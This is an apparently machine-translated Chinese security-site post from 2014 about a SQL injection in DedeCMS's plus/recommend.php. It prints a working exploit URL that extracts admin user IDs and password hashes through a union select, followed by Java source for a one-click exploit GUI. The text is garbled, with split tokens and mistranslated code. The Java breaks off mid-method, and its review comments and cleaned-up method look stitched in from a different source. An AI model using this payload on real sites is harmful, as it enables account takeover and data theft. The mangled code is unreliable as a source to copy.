DedeCMS SQL injection affecting all versions: exploit code and tool - vulnerability warning - the black bar safety net

2014-03-01T00:00:00
ID MYHACK58:62201442594
Type myhack58
Reporter 佚名
Modified 2014-03-01T00:00:00

Description

DedeCMS ("Woven Dream") is an open-source PHP content management system for websites. It is known for being simple, practical and open source; it is the best-known PHP open-source website management system in China and the PHP CMS with the most users. Recently, a netizen found an SQL injection vulnerability in DedeCMS that affects all versions. The latest official version fixes the vulnerability, so affected sites should upgrade to it; requests to plus/recommend.php that carry `_FILES[...]` parameters in the query string, as in the request below, are the pattern to look for in web server logs. The related exploit code is as follows:

EXP:

Exp:plus/recommend. php? action=&aid=1&_FILES[type][tmp_name]=\'

or mid=@`\" /! 50000union//! 50000select/1,2,3,(select

CONCAT(0x7c,userid,0x7c,pwd)+from+%2 3@__admin

limit+0,1),5,6,7,8,9%2 3@`\"+&_FILES[type][name]=1. jpg&_FILES[type]

[type]=application/octet-stream&_FILES[type][size]=1 1 1

Source code of the exploit tool (by the principal):

package org. javaweb. dede. ui; import java. awt. Toolkit; import java. io. BufferedReader; import java. io. InputStreamReader; import java. net. URL; import java. util. regex. Matcher; import java. util. regex. Pattern; /**

*

  • @author yz

*/ public class MainFrame extends javax. swing. The JFrame {

// Serialization version stamp for this frame class; declared explicitly so the
// value does not depend on a compiler-generated default.
private static final long serialVersionUID = 1L;

/**
 * Builds the frame. All widget creation, wiring and layout is delegated to
 * {@code initComponents()}.
 */
public MainFrame() {
    super();
    this.initComponents();
}

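/**
 * Fetches {@code url} and returns the response body as text.
 *
 * <p>Every line read is re-terminated with CRLF. If anything fails, the
 * exception text is written to {@code jTextArea1} and whatever had been read
 * up to that point is returned (an empty string if nothing was read).
 *
 * <p>NOTE(review): {@code URL.openStream()} sets no connect/read timeout,
 * decodes with the platform default charset, and accepts any scheme the JVM
 * has a handler for (not only http/https). A caller that passes text taken
 * from outside should check the scheme first.
 *
 * @param url absolute URL to read
 * @return the text read, one CRLF-terminated line per input line
 */
public String request(String url) {
    StringBuilder body = new StringBuilder();
    BufferedReader reader = null;
    try {
        reader = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
        String line;
        while ((line = reader.readLine()) != null) {
            // StringBuilder avoids re-copying the whole body on every line.
            body.append(line).append("\r\n");
        }
    } catch (Exception e) {
        // Deliberate best-effort: surface the failure in the UI, return the partial body.
        jTextArea1.setText(e.toString());
    } finally {
        // The original never closed the reader, leaking the connection stream.
        if (reader != null) {
            try {
                reader.close();
            } catch (Exception ignored) {
                // Nothing useful can be done if close fails; the body is already read.
            }
        }
    }
    return body.toString();
}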

private void initComponents() {

jPanel1 = new javax. swing. JPanel(); jLabel1 = new javax. swing. JLabel(); jTextField1 = new javax. swing. JTextField(); jButton1 = new javax. swing. JButton(); jScrollPane1 = new javax. swing. JScrollPane(); jTextArea1 = new javax. swing. JTextArea();

setDefaultCloseOperation(javax. swing. WindowConstants. EXIT_ON_CLOSE);

jLabel1. setText("URL:"); jTextField1. setText("http://localhost");

this. setTitle("DedeCms recommend. php injection exploit tool-p2j. cn");

int screenWidth = Toolkit. getDefaultToolkit(). getScreenSize(). width; int screenHeight = Toolkit. getDefaultToolkit(). getScreenSize(). height; this. setBounds(screenWidth / 2 - 2 2 9, screenHeight/ 2 - 1 5 8, 4 5 8, 3 1 6);

jButton1. setText("get"); jButton1. addActionListener(new java. awt. event. ActionListener() { public void actionPerformed(java. awt. event. ActionEvent evt) { jButton1ActionPerformed(evt); } });

jTextArea1. setColumns(2 0); jTextArea1. setRows(5); jScrollPane1. setViewportView(jTextArea1);

javax. swing. GroupLayout jPanel1Layout = new javax. swing. GroupLayout(jPanel1); jPanel1. setLayout(jPanel1Layout); jPanel1Layout. setHorizontalGroup( jPanel1Layout. createParallelGroup(javax. swing. GroupLayout. Alignment. LEADING) . addGroup(jPanel1Layout. createSequentialGroup() . addGroup(jPanel1Layout. createParallelGroup(javax. swing. GroupLayout. Alignment. TRAILING, false) . addComponent(jScrollPane1, javax. swing. GroupLayout. Alignment. LEADING) . addGroup(javax. swing. GroupLayout. Alignment. LEADING, jPanel1Layout. createSequentialGroup() . addContainerGap() . addComponent(jLabel1) . addPreferredGap(javax. swing. LayoutStyle. ComponentPlacement. RELATED) . addComponent(jTextField1, javax. swing. GroupLayout. PREFERRED_SIZE, 3 3 1, javax. swing. GroupLayout. PREFERRED_SIZE) . addPreferredGap(javax. swing. LayoutStyle. ComponentPlacement. RELATED) . addComponent(jButton1, javax. swing. GroupLayout. PREFERRED_SIZE, 8 3, javax. swing. GroupLayout. PREFERRED_SIZE))) . addGap(0, 0, Short. MAX_VALUE)) ); jPanel1Layout. setVerticalGroup( jPanel1Layout. createParallelGroup(javax. swing. GroupLayout. Alignment. LEADING) . addGroup(jPanel1Layout. createSequentialGroup() . addContainerGap() . addGroup(jPanel1Layout. createParallelGroup(javax. swing. GroupLayout. Alignment. BASELINE) . addComponent(jLabel1) . addComponent(jTextField1, javax. swing. GroupLayout. PREFERRED_SIZE,
